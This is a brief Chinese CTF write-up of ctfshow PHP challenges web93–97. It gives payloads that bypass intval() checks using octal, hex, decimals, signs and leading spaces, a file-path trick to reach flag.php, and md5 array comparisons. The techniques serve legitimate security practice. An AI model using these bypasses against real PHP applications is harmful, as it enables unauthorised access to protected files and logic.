ctfshow web入门 php特性 web93-97

1.web93

intval($num,0),0代表根据变量类型进行使用哪一种进制进行取整
可以使用8进制，正负数，小数点
payload:
010574
+4476.0
4476.0

2.web94

过滤了0，不能使用8进制了，还可以使用小数点，正负数等
payload：
4476.0
+4476.0
%20010574

intval绕过方法：

intval('4476.0')===4476    小数点  
intval('+4476.0')===4476   正负号
intval('4476e0')===4476    科学计数法
intval('0x117c')===4476    16进制
intval('010574')===4476    8进制
intval(' 010574')===4476   8进制+空格

3.web95

有过滤了点，小数点法用不了了，可以使用空格加八进制数绕过
payload：
%20010574

4.web96

可以使用目录分隔符绕过,相对路径和绝对路径都可以
payload:
./flag.php
/var/www/html/flag.php

5.web97

数字不相等，但是md5值相等
MD5处理数组返回的都是null
payload:
a[]=1&b[]=2

ctfshow php特性